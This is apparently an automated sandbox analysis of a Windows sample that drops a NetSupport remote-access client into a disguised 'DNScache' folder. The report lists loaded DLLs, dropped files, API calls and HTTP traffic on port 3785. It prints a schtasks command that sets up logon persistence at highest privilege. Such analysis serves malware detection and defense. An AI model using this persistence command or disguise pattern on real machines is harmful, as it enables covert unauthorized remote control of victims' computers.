Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: lFxGd66yDa.exe

Static file information: File size 5112587 > 1048576

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

File opened: C:\Users\user\AppData\Local\DNScache\MSVCR100.dll

Jump to behavior

Source: lFxGd66yDa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.4576435931.000000006C6F2000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.2270148360.000000006C6F2000.00000002.00000001.01000000.00000009.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000004.00000002.4575938208.000000006C601000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 00000006.00000002.2269867931.000000006C601000.00000020.00000001.01000000.0000000B.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: msauserext.pdbGCTL source: msauserext.dll.0.dr
Source:	Binary string: mscpxl32.pdb source: lFxGd66yDa.exe, 00000000.00000003.2192434264.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192581404.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, mscpxl32.dLL.0.dr
Source:	Binary string: mscpxl32.pdbGCTL source: lFxGd66yDa.exe, 00000000.00000003.2192434264.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192581404.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, mscpxl32.dLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: mscat32.pdbGCTL source: mscat32.dll.0.dr
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217417326.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, msvcp140_1.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: lFxGd66yDa.exe, 00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.0.dr
Source:	Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr
Source:	Binary string: msauserext.pdb source: msauserext.dll.0.dr
Source:	Binary string: client32_ctr.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.4576301336.000000006C6D5000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000006.00000002.2270046103.000000006C6D5000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.0.dr
Source:	Binary string: mscat32.pdb source: mscat32.dll.0.dr
Source:	Binary string: 0\1100\client32\Release\client32_ctr.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217053423.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192368792.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2254464370.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2191851430.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000002.2258602434.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2217142601.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, lFxGd66yDa.exe, 00000000.00000003.2192469922.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr
Source:	Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: lFxGd66yDa.exe, 00000000.00000003.2217525712.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, msvcp140_codecvt_ids.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr

Source: lFxGd66yDa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: lFxGd66yDa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: lFxGd66yDa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: lFxGd66yDa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: lFxGd66yDa.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: neth.dll.0.dr

Static PE information: 0x70C3A9CF [Thu Dec 13 15:46:23 2029 UTC]

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

Code function: 4_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

4_2_11029200

Source: lFxGd66yDa.exe	Static PE information: section name: .config
Source: msauserext.dll.0.dr	Static PE information: section name: .didat
Source: PCICL32.DLL.0.dr	Static PE information: section name: .hhshare

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	Code function: 0_2_001A7F81 push ecx; ret	0_2_001A7F94
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_1116B735 push ecx; ret	4_2_1116B748
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_11166629 push ecx; ret	4_2_1116663C
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3F6BBF push ecx; ret	4_2_6C3F6BD2
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3E94C5 push ecx; ret	4_2_6C3E94D8
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C602D80 push eax; ret	4_2_6C602D9E
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C610995 push ecx; ret	4_2_6C6109A8
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C62A6AA push EF3FEFD4h; iretd	4_2_6C62A6B1
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_1116B735 push ecx; ret	6_2_1116B748
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 6_2_11166629 push ecx; ret	6_2_1116663C

Source: msvcr100.dll.0.dr

Static PE information: section name: .text entropy: 6.909044922675825

Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\client32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\msauserext.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\neth.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\pcicapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\mscat32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\netmsg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL	Jump to dropped file
Source: C:\Users\user\Desktop\lFxGd66yDa.exe	File created: C:\Users\user\AppData\Local\DNScache\remcmdstub.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3D7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,	4_2_6C3D7030
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3C5490 GetPrivateProfileIntA,	4_2_6C3C5490
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3C50E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,	4_2_6C3C50E0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe	Code function: 4_2_6C3C5117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,	4_2_6C3C5117

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\lFxGd66yDa.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST

Source: C:\Users\user\AppData\Local\DNScache\client32.exe

4_2_11124DC0

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 3785 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 3785 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 3785
